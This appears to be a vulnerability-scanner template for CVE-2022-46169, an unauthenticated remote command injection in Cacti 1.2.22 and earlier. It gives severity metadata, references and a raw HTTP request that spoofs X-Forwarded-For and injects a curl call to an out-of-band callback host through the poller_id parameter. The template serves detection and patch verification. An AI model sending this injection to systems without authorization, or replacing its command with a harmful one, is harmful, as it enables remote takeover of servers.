id: CVE-2022-46169 info: name: Cacti <=1.2.22 - Remote Command Injection author: Hardik-Solanki,j4vaovo severity: critical description: | Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: | Upgrade Cacti to version 1.2.23 or later to mitigate this vulnerability. reference: - https://security-tracker.debian.org/tracker/CVE-2022-46169 - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf - https://www.cybersecurity-help.cz/vdb/SB2022121926 - https://nvd.nist.gov/vuln/detail/CVE-2022-46169 - https://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-46169 cwe-id: CWE-78,CWE-74 epss-score: 0.96678 epss-percentile: 0.99552 cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cacti product: cacti shodan-query: title:"Login to Cacti" tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth variables: useragent: '{{rand_base(6)}}' http: - raw: - | GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1 Host: {{Hostname}} X-Forwarded-For: 127.0.0.1 unsafe: true matchers-condition: and matchers: - type: word part: body words: - '"value":' - '"local_data_id":' condition: and - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "User-Agent: {{useragent}}" - type: status status: - 200 # digest: 4b0a00483046022100d3dac6e1ec685013ad6fafd7c6b92feb9e69424bdf5414ebf54d0e5c880df4e7022100e0ebc7fdd396cf66d0a0467822fcaa2a1b3af2176552c00840ab00fd6c8adf79:922c64590222798bb761d5b6d8e72950